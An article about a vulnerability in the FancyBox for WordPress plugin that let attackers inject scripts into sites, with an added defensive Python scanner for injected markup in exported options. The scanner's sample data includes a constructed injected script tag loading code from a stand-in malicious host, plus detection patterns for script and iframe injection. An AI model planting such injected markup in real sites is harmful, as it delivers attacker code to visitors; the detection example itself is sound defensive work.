A critical vulnerability has been found in one of WordPress’ plugins called ‘FancyBox for WordPress’. This plugin has been downloaded over 600,000 times and is obviously something to be aware of considering the number of possible sites affected.
Daniel Cid, founder and chief technology officer of Sucuri who discovered the vulnerability, wrote in an article ‘After some analysis, we can confirm that this plugin has a serious vulnerability that allows for malware (or any random script/content) to be added to the vulnerable site.’ At the time of posting, the vulnerability was unpatched and as such, Daniel did not offer any more insight other than to remove the plugin, immediately.
Since then, the developers wasted no time and released two patches, 3.03 and 3.04. The former fixed the actual security flaw; the latter renamed the setting affected by the issue, so that any malicious code already stored in it stops appearing on sites that update the plugin without first removing that code.
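A site that updates the plugin is still responsible for finding out whether injected content is sitting in its settings. The following is an added example (not code from the article, Sucuri or the plugin's developers) of the kind of check an administrator could run over exported options: it scans option values for script and iframe markup and reports which options carry it. The option name `mfbfw` and all sample values are constructed for illustration and are not taken from the page; in practice the rows would come from a query of the `wp_options` table or from `wp option list --format=json`.

```python
import json
import re

# Constructed sample rows, shaped like `wp option list --format=json` output.
# The option name "mfbfw" is an assumed placeholder for the plugin's settings
# row, not a value taken from the article. Real WordPress values are usually
# PHP-serialized strings rather than JSON, but the scan below works on the raw
# string either way because it never tries to deserialize.
SAMPLE_OPTIONS_JSON = json.dumps([
    {"option_name": "siteurl", "option_value": "https://example.test"},
    {"option_name": "mfbfw", "option_value": json.dumps({
        "zoomOpacity": "1",
        # injected content a stored-script vulnerability would leave behind
        "extraCallsData": '<script src="//malicious.example/inject.js"></script>',
    })},
    {"option_name": "mfbfw_active", "option_value": "1"},
])

# Markup that has no business inside plain plugin settings.
INJECTION_PATTERNS = [
    re.compile(r"<script\b", re.IGNORECASE),
    re.compile(r"<iframe\b", re.IGNORECASE),
    re.compile(r"javascript:", re.IGNORECASE),
]


def find_injected_options(options_json, name_prefix=""):
    """Return a list of {option_name, patterns} for every option whose raw
    value matches one of INJECTION_PATTERNS. name_prefix optionally limits
    the scan to one plugin's options (e.g. the plugin's settings prefix)."""
    hits = []
    for row in json.loads(options_json):
        name = row.get("option_name", "")
        if name_prefix and not name.startswith(name_prefix):
            continue
        value = row.get("option_value", "")
        if not isinstance(value, str):
            # option_value may already be decoded; scan its textual form
            value = json.dumps(value)
        matched = [p.pattern for p in INJECTION_PATTERNS if p.search(value)]
        if matched:
            hits.append({"option_name": name, "patterns": matched})
    return hits


if __name__ == "__main__":
    for hit in find_injected_options(SAMPLE_OPTIONS_JSON):
        print(f"suspicious option {hit['option_name']!r}: {hit['patterns']}")
```

Any option flagged this way should be reviewed by hand and cleaned, because an update of the plugin alone does not touch stored values; the prefix filter keeps the scan focused on one plugin's rows when the whole options table is large.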
It's hard to avoid being the subject of an attack like this if you use a third-party publishing platform, because the design of the code is not the end user's choice. WordPress is used on over 70 million websites and is obviously a popular target for hackers. The majority of people who choose this style of site use it because it is easy to set up and manage. A perfect example of the price of choosing convenience over security.